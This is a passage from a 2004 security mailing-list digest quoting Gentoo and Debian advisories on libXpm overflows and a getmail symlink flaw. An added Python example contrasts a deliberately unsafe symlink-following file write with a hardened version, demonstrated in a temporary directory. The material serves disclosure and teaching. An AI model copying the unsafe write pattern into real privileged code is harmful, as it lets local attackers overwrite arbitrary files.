> contains multiple stack and integer overflows that may allow a
> carefully-crafted XPM file to crash applications linked against
> libXpm, potentially allowing the execution of arbitrary code.
>
> Background
> ==========
>
> XFree86 and X.org are both implementations of the X Window System.
>
> Affected packages
> =================
>
> -------------------------------------------------------------------
>     Package             /  Vulnerable  /               Unaffected
> -------------------------------------------------------------------
>  1  x11-base/xorg-x11      < 6.7.0-r2                *>= 6.7.0-r2
>                            == 6.8.0                   >= 6.8.0-r1
>  2  x11-base/xfree         < 4.3.0-r7                 >= 4.3.0-r7
> -------------------------------------------------------------------
> # Package 2 [x11-base/xfree] only applies to ALPHA and x86 users.
>
> NOTE: Any packages listed without architecture tags apply to all
> architectures...
> -------------------------------------------------------------------
> NOTE: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64,
> MIPS, PPC and SPARC architectures: XFree86 users on those
> architectures should switch to X.org rather than upgrading
> XFree86.
> -------------------------------------------------------------------
> 2 affected packages
> -------------------------------------------------------------------
>
> Description
> ===========
>
> Chris Evans has discovered multiple integer and stack overflow
> vulnerabilities in the X Pixmap library, libXpm, which is a part of the
> X Window System. These overflows can be exploited by the execution of a
> malicious XPM file, which can crash applications that are dependent on
> libXpm.
>
> Impact
> ======
>
> A carefully-crafted XPM file could crash applications that are linked
> against libXpm, potentially allowing the execution of arbitrary code
> with the privileges of the user running the application.
>
> Workaround
> ==========
>
> There is no known workaround at this time.
>
> Resolution
> ==========
>
> All X.org users should upgrade to the latest version:
>
> # emerge sync
>
> # emerge -pv ">=x11-base/xorg-x11-6.7.0-r2"
> # emerge ">=x11-base/xorg-x11-6.7.0-r2"
>
> All XFree86 users should upgrade to the latest version:
>
> # emerge sync
>
> # emerge -pv ">=x11-base/xfree-4.3.0-r7"
> # emerge ">=x11-base/xfree-4.3.0-r7"
>
> Note: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS,
> PPC and SPARC architectures: XFree86 users on those architectures
> should switch to X.org rather than upgrading XFree86.
>
> References
> ==========
>
> [ 1 ] X.org Security Advisory
> http://freedesktop.org/pipermail/xorg/2004-September/003196.html
> [ 2 ] X11R6.8.1 Release Notes
> http://freedesktop.org/pipermail/xorg/2004-September/003172.html
> [ 3 ] CAN-2004-0687
> http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0687
> [ 4 ] CAN-2004-0688
> http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0688
>
> Availability
> ============
>
> This GLSA and any updates to it are available for viewing at
> the Gentoo Security Website:
>
> http://security.gentoo.org/glsa/glsa-200409-34.xml
>
> Concerns?
> =========
>
> Security is a primary focus of Gentoo Linux and ensuring the
> confidentiality and security of our users' machines is of utmost
> importance to us. Any security concerns should be addressed to
> security@...too.org or alternatively, you may file a bug at
> http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2004 Gentoo Foundation, Inc; referenced text
> belongs to its owner(s).
>
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/1.0
>
> --------------enigEA6620FABBD9968E5B2250AD
> Content-Type: application/pgp-signature; name="signature.asc"
> Content-Description: OpenPGP digital signature
> Content-Disposition: attachment; filename="signature.asc"
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.4 (GNU/Linux)
>
> iD8DBQFBV+EAvcL1obalX08RAus+AJ9Og0NSi/Uf/i3Rw0656rai7fKZMwCeJVWS
> oxM9KaPNaz3q7G2WAXIvbrg=
> =OQU0
> -----END PGP SIGNATURE-----
>
> --------------enigEA6620FABBD9968E5B2250AD--
>
> --__--__--
>
> Message: 16
> Date: Mon, 27 Sep 2004 11:44:23 +0200
> From: Thierry Carrez <koon@...too.org>
> Organization: Gentoo Linux
> Cc: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com,
> security-alerts@...uxsecurity.com
> To: andreas.zuercher@...ma.ch
> Subject: [Full-Disclosure] [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in
> libXpm
>
>
> --__--__--
>
> Message: 17
> Date: Mon, 27 Sep 2004 12:34:05 +0200 (CEST)
> Reply-To: full-disclosure@...ts.netsys.com
> From: debian-security-announce@...ts.debian.org
> To: full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] [SECURITY] [DSA 553-1] New getmail packages fix root compromise
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> - --------------------------------------------------------------------------
> Debian Security Advisory DSA 553-1 security@...ian.org
> http://www.debian.org/security/ Martin Schulze
> September 27th, 2004 http://www.debian.org/security/faq
> - --------------------------------------------------------------------------
>
> Package : getmail
> Vulnerability : symlink vulnerability
> Problem-Type : local
> Debian-specific: no
> CVE ID : CAN-2004-0880 CAN-2004-0881
> Debian Bug : 272561
>
> A security problem has been discovered in getmail, a POP3 and APOP
> mail gatherer and forwarder. An attacker with a shell account on the
> victim's host could utilise getmail to overwrite arbitrary files when
> it is running as root.
>
> For the stable distribution (woody) this problem has been fixed in
> version 2.3.7-2.
>
> For the unstable distribution (sid) this problem has been fixed in
> version 3.2.5-1.
>
> We recommend that you upgrade your getmail package.
>
> Upgrade Instructions
> - --------------------
>
> wget url
> will fetch the file for you
> dpkg -i file.deb
> will install the referenced file.
>
> If you are using the apt-get package manager, use the line for
> sources.list as given below:
>
> apt-get update
> will update the internal database
> apt-get upgrade
> will install corrected packages
>
> You may use an automated update by adding the resources from the
> footer to the proper configuration.
>
> Debian GNU/Linux 3.0 alias woody
> - --------------------------------
>
> Source archives:
>
> http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2.dsc
> Size/MD5 checksum: 583 6263f8d2d75ec3eb21dd302e0b9d6729
> http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2.diff.gz
> Size/MD5 checksum: 2645 ff40d8f72744bfec8a963ece950e0bcd
> http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7.orig.tar.gz
> Size/MD5 checksum: 70944 4eef6be77a4cbe1a86eef75affd31b05
>
> Architecture independent components:
>
> http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2_all.deb
> Size/MD5 checksum: 74388 f2b9e79b1ddd8ef8bf719d4e1894f051
>
> These files will probably be moved into the stable distribution on
> its next update.
>
> - ---------------------------------------------------------------------------------
> For apt-get: deb http://security.debian.org/ stable/updates main
> For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
> Mailing list: debian-security-announce@...ts.debian.org
> Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.5 (GNU/Linux)
>
> iD8DBQFBV+ydW5ql+IAeqTIRAjKVAJ4jTCBi6jY/HaghCNdQUVfyy2giOQCbB688
> 7yr1RQ2U25tXqQDxJZqHyPE=
> =3lYo
> -----END PGP SIGNATURE-----
>
> --__--__--
>
> _______________________________________________
> Full-Disclosure mailing list
> Full-Disclosure@...ts.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>
> End of Full-Disclosure Digest
>
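DSA 553-1, quoted above, names the bug class (a symlink followed by a process running as root) but shows no code. The following is an added illustration of that class and a hardened write, not getmail's code and not part of the advisory; the function names, file names and scenario are hypothetical.

```python
import os
import stat
import tempfile

def deliver_unsafe(path, data):
    # Vulnerable pattern: open() follows a symlink planted at `path`,
    # so a privileged writer appends to whatever the link points at.
    with open(path, "ab") as f:
        f.write(data)

def deliver_safe(path, data):
    # O_NOFOLLOW makes open fail (ELOOP) if the final component is a symlink.
    # It does not vet parent directories, so those must not be attacker-writable.
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o600)
    try:
        st = os.fstat(fd)  # inspect the object actually opened, not the name
        if not stat.S_ISREG(st.st_mode) or st.st_nlink != 1:
            raise OSError("refusing to write: not a singly linked regular file")
        os.write(fd, data)
    finally:
        os.close(fd)

def demo():
    # Constructed scenario inside a private temp dir; no real system files touched.
    with tempfile.TemporaryDirectory() as d:
        protected = os.path.join(d, "protected.conf")
        with open(protected, "wb") as f:
            f.write(b"original\n")
        spool = os.path.join(d, "spool")
        os.symlink(protected, spool)  # link planted where the writer expects its file
        try:
            deliver_safe(spool, b"mail\n")
            blocked = False
        except OSError:
            blocked = True
        with open(protected, "rb") as f:
            after_safe = f.read()
        deliver_unsafe(spool, b"mail\n")
        with open(protected, "rb") as f:
            after_unsafe = f.read()
        return blocked, after_safe, after_unsafe

if __name__ == "__main__":
    print(demo())
```

Refusing the symlink is only part of the mitigation: a delivery agent that writes into user-controlled directories should also drop root privileges to the owning user before opening anything.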